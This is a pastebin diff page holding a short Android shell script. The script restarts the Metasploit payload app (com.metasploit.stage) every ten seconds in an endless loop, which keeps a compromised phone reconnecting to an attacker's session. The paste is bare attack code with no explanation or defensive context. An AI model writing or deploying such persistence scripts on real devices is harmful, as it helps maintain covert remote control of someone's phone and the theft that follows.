View difference between Paste ID: 4xPNRyEd and imrznzuf
SHOW: | | - or go back to the newest paste.
1
#!/bin/sh
2
while :
3
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
4
sleep 10
5
done